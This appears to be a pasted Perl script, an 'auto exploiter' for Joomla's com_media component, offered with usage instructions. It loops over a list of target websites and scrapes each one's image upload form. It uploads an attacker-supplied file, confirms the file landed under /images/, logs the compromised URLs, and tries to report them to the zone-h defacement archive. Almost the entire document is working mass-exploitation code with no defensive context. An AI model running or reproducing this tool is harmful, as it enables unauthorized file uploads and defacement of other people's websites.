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exploit joomla 2018 coded by

a guest
Mar 17th, 2018
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  1. 1. #!/usr/bin/perl
  2. 2. # ->Coded by
  3. 3. # ->we are tunisian hakers
  4. 4. # ->fuck all
  5. 5.
  6. 6. use Win32::Console::ANSI;
  7. 7. use Term::ANSIColor;
  8. 8. use LWP::UserAgent;
  9. 9. use HTTP::Request::Common;
  10. 10. if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
  11. 11. print"\n";
  12. 12. print colored (" --=[Com_media Auto Explo!ter]",'blue'),"\n";
  13. 13. print colored (" --=[Code by CrashBandicot]",'red'),"\n";
  14. 14. print colored (" --=[Update by v4p0r and Tr4xb0y]",'yellow'),"\n";
  15. 15. print colored (" --=[Usage : $0 list.txt file.jpg or file.txt",'green'),"\n";
  16. 16.
  17. 17. ;
  18. 18.
  19. 19. $file = $ARGV[1];
  20. 20. unless ($file) {
  21. 21.
  22. 22. print colored (" \n\n --=[Usage : $0 list.txt file.jpg or file.txt",'green'),"\n\n";
  23. 23. exit;
  24. 24. }
  25. 25. open(tarrget,"<$ARGV[0]") or die "$!";
  26. 26. while(<tarrget>){
  27. 27. chomp($_);
  28. 28. $webs = $_;
  29. 29. if($webs !~ /http:\/\//)
  30. 30. {
  31. 31. $webs = "http://$webs";
  32. 32. }
  33. 33. $zeeb = $webs."/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  34. 34.
  35. 35. print colored "\n\n [+] Scanning -> $webs",'green';
  36. 36.
  37. 37. $ua = LWP::UserAgent->new;
  38. 38. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  39. 39. $fucki = $ua->get($zeeb);
  40. 40. $kzz = $fucki->content;
  41. 41. if($kzz =~/<form action="(.*?)" id=\"uploadForm\" class=\"form-horizontal\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ || $kzz =~ /<form action="(.*?)" id=\"uploadForm\" name=\"uploadForm\" method=\"post\" enctype=\"multipart\/form-data\">/ )
  42. 42. {
  43. 43. print colored "\n [+] Try Upload >> $webs",'green'; sleep(1);
  44. 44.
  45. 45. $url = $1;
  46. 46. $url =~ s/&amp;/&/gi;
  47. 47.
  48. 48. } else { print colored "\n [-] com_media not found -> $webs",'red'; sleep(1); }
  49. 49.
  50. 50. my $res = $ua->post($url, Content_Type => 'form-data', Content => [ Filedata => [$file] ]);
  51. 51.
  52. 52. $shell = $webs."/images/".$file;
  53. 53.
  54. 54. $check = $ua->get($shell);
  55. 55. if($check->content =~/by/ || $check->is_success ) {
  56. 56.
  57. 57. print colored "\n [+] File Uploaded >> $shell\n",'yellow';
  58. 58.
  59. 59. open(save ,">>save.txt");
  60. 60. print save "$shell\n";
  61. 61. close save;
  62. 62.
  63. 63. $res= $ua->post("",[
  64. 64. 'defacer' => 'v4p0r', # seu nick
  65. 65. 'domain1' => $shell,
  66. 66. 'hackmode' => '15',
  67. 67. 'reason' => '1',
  68. 68. 'submit' => 'Send',
  69. 69. ]);
  70. 70. if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
  71. 71. print colored " [+] Submit zone-h $1\n",'red'; sleep(1);
  72. 72. }
  73. 73. else
  74. 74. {
  75. 75. print colored "\n [-] Submit zone-h ERROR\n",'blue'; sleep(1);
  76. 76. }
  77. 77.
  78. 78. } else { print colored "\n [-] File Upload Fail",'red'; }
  79. 79.
  80. 80.
  81. 81. }
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